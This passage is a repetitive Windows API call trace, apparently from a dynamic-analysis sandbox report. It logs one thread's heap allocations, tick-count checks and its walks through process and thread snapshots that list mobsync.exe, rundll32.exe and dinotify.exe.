0x35c [0147.982] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.982] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.982] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0147.983] GetTickCount () returned 0x1134ecc [0147.983] GetCurrentThreadId () returned 0x35c [0147.983] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.983] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.983] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1 [0147.983] GetTickCount () returned 0x1134ecc [0147.983] GetCurrentThreadId () returned 0x35c [0147.983] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.983] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.983] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1 [0147.984] GetTickCount () returned 0x1134ecc [0147.984] GetCurrentThreadId () returned 0x35c [0147.984] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.984] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.984] Process32Next (in: hSnapshot=0x630, lppe=0x391f258 | out: lppe=0x391f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 0 [0147.985] GetTickCount () returned 0x1134ecc [0147.985] Thread32First (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.985] GetCurrentThreadId () returned 0x35c [0147.985] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.985] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.985] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.986] GetTickCount () returned 0x1134ecc [0147.986] GetCurrentThreadId () returned 0x35c [0147.986] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.986] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.986] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.987] GetTickCount () returned 0x1134ecc [0147.987] GetCurrentThreadId () returned 0x35c [0147.987] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.987] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.987] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.987] GetTickCount () returned 0x1134ecc [0147.988] GetCurrentThreadId () returned 0x35c [0147.988] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.988] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.988] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.988] GetTickCount () returned 0x1134ecc [0147.988] GetCurrentThreadId () returned 0x35c [0147.988] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.988] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.988] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.989] GetTickCount () returned 0x1134ecc [0147.989] GetCurrentThreadId () returned 0x35c [0147.989] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.989] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.989] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.990] GetTickCount () returned 0x1134ecc [0147.990] GetCurrentThreadId () returned 0x35c [0147.990] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.990] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.990] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.991] GetTickCount () returned 0x1134ecc [0147.991] GetCurrentThreadId () returned 0x35c [0147.991] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.991] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.991] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.991] GetTickCount () returned 0x1134ecc [0147.991] GetCurrentThreadId () returned 0x35c [0147.991] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.991] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.991] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.992] GetTickCount () returned 0x1134ecc [0147.992] GetCurrentThreadId () returned 0x35c [0147.992] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.992] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.992] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.993] GetTickCount () returned 0x1134ecc [0147.993] GetCurrentThreadId () returned 0x35c [0147.993] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.993] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.993] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.994] GetTickCount () returned 0x1134edc [0147.994] GetCurrentThreadId () returned 0x35c [0147.994] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.994] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.994] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.995] GetTickCount () returned 0x1134edc [0147.995] GetCurrentThreadId () returned 0x35c [0147.995] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.995] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.995] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.996] GetTickCount () returned 0x1134edc [0147.996] GetCurrentThreadId () returned 0x35c [0147.996] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.996] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.996] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.996] GetTickCount () returned 0x1134edc [0147.996] GetCurrentThreadId () returned 0x35c [0147.997] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.997] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.997] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.997] GetTickCount () returned 0x1134edc [0147.997] GetCurrentThreadId () returned 0x35c [0147.997] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.997] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.997] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.998] GetTickCount () returned 0x1134edc [0147.998] GetCurrentThreadId () returned 0x35c [0147.998] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.998] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.998] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.999] GetTickCount () returned 0x1134edc [0147.999] GetCurrentThreadId () returned 0x35c [0147.999] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.999] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.999] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0147.999] GetTickCount () returned 0x1134edc [0147.999] GetCurrentThreadId () returned 0x35c [0147.999] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.000] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.000] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.000] GetTickCount () returned 0x1134edc [0148.000] GetCurrentThreadId () returned 0x35c [0148.000] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.000] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.000] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.001] GetTickCount () returned 0x1134edc [0148.001] GetCurrentThreadId () returned 0x35c [0148.001] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.001] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.001] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.002] GetTickCount () returned 0x1134edc [0148.002] GetCurrentThreadId () returned 0x35c [0148.002] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.002] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.002] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.002] GetTickCount () returned 0x1134edc [0148.002] GetCurrentThreadId () returned 0x35c [0148.002] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.003] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.003] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.003] GetTickCount () returned 0x1134edc [0148.003] GetCurrentThreadId () returned 0x35c [0148.003] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.003] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.003] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.004] GetTickCount () returned 0x1134edc [0148.004] GetCurrentThreadId () returned 0x35c [0148.004] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.004] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.004] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.005] GetTickCount () returned 0x1134edc [0148.005] GetCurrentThreadId () returned 0x35c [0148.005] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.005] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.005] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.005] GetTickCount () returned 0x1134edc [0148.005] GetCurrentThreadId () returned 0x35c [0148.005] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.005] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.005] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.006] GetTickCount () returned 0x1134edc [0148.006] GetCurrentThreadId () returned 0x35c [0148.006] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.006] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.006] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.007] GetTickCount () returned 0x1134edc [0148.007] GetCurrentThreadId () returned 0x35c [0148.007] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.007] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.007] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.008] GetTickCount () returned 0x1134edc [0148.008] GetCurrentThreadId () returned 0x35c [0148.008] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.008] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.008] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.008] GetTickCount () returned 0x1134edc [0148.008] GetCurrentThreadId () returned 0x35c [0148.008] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.008] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.008] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.009] GetTickCount () returned 0x1134eeb [0148.009] GetCurrentThreadId () returned 0x35c [0148.009] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.009] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.009] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.010] GetTickCount () returned 0x1134eeb [0148.010] GetCurrentThreadId () returned 0x35c [0148.010] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.010] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.010] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.011] GetTickCount () returned 0x1134eeb [0148.011] GetCurrentThreadId () returned 0x35c [0148.011] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.011] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.011] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.011] GetTickCount () returned 0x1134eeb [0148.011] GetCurrentThreadId () returned 0x35c [0148.011] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.011] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.011] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.012] GetTickCount () returned 0x1134eeb [0148.012] GetCurrentThreadId () returned 0x35c [0148.012] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.012] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.012] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.013] GetTickCount () returned 0x1134eeb [0148.013] GetCurrentThreadId () returned 0x35c [0148.013] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.013] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.013] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.013] GetTickCount () returned 0x1134eeb [0148.013] GetCurrentThreadId () returned 0x35c [0148.013] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.013] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.013] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.014] GetTickCount () returned 0x1134eeb [0148.014] GetCurrentThreadId () returned 0x35c [0148.014] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.014] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.014] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.015] GetTickCount () returned 0x1134eeb [0148.015] GetCurrentThreadId () returned 0x35c [0148.015] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.015] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.015] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.015] GetTickCount () returned 0x1134eeb [0148.015] GetCurrentThreadId () returned 0x35c [0148.015] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.015] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.016] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.016] GetTickCount () returned 0x1134eeb [0148.016] GetCurrentThreadId () returned 0x35c [0148.016] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.016] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.016] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.017] GetTickCount () returned 0x1134eeb [0148.017] GetCurrentThreadId () returned 0x35c [0148.017] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.017] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.017] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.017] GetTickCount () returned 0x1134eeb [0148.018] GetCurrentThreadId () returned 0x35c [0148.018] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.018] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.018] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.018] GetTickCount () returned 0x1134eeb [0148.018] GetCurrentThreadId () returned 0x35c [0148.018] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.018] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.018] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.019] GetTickCount () returned 0x1134eeb [0148.019] GetCurrentThreadId () returned 0x35c [0148.019] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.019] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.019] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.020] GetTickCount () returned 0x1134eeb [0148.020] GetCurrentThreadId () returned 0x35c [0148.020] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.020] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.020] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.020] GetTickCount () returned 0x1134eeb [0148.020] GetCurrentThreadId () returned 0x35c [0148.020] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.020] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.020] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.021] GetTickCount () returned 0x1134eeb [0148.021] GetCurrentThreadId () returned 0x35c [0148.021] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.021] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.021] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.022] GetTickCount () returned 0x1134eeb [0148.022] GetCurrentThreadId () returned 0x35c [0148.022] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.022] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.022] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.022] GetTickCount () returned 0x1134eeb [0148.022] GetCurrentThreadId () returned 0x35c [0148.022] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.022] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.022] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.023] GetTickCount () returned 0x1134eeb [0148.023] GetCurrentThreadId () returned 0x35c [0148.023] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.023] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.023] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.024] GetTickCount () returned 0x1134eeb [0148.024] GetCurrentThreadId () returned 0x35c [0148.024] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.024] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.024] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.024] GetTickCount () returned 0x1134efb [0148.025] GetCurrentThreadId () returned 0x35c [0148.025] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.025] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.025] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.025] GetTickCount () returned 0x1134efb [0148.025] GetCurrentThreadId () returned 0x35c [0148.025] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.025] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.025] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.026] GetTickCount () returned 0x1134efb [0148.026] GetCurrentThreadId () returned 0x35c [0148.026] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.026] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.026] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.027] GetTickCount () returned 0x1134efb [0148.027] GetCurrentThreadId () returned 0x35c [0148.027] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.027] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.027] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.027] GetTickCount () returned 0x1134efb [0148.027] GetCurrentThreadId () returned 0x35c [0148.027] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.027] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.027] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.028] GetTickCount () returned 0x1134efb [0148.028] GetCurrentThreadId () returned 0x35c [0148.028] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.028] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.028] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.029] GetTickCount () returned 0x1134efb [0148.029] GetCurrentThreadId () returned 0x35c [0148.029] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.029] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.029] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.029] GetTickCount () returned 0x1134efb [0148.029] GetCurrentThreadId () returned 0x35c [0148.029] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.029] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.029] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.030] GetTickCount () returned 0x1134efb [0148.030] GetCurrentThreadId () returned 0x35c [0148.030] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.030] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.030] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.031] GetTickCount () returned 0x1134efb [0148.031] GetCurrentThreadId () returned 0x35c [0148.031] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.031] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.031] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.031] GetTickCount () returned 0x1134efb [0148.031] GetCurrentThreadId () returned 0x35c [0148.031] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.031] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.032] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.032] GetTickCount () returned 0x1134efb [0148.032] GetCurrentThreadId () returned 0x35c [0148.032] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.032] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.032] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.033] GetTickCount () 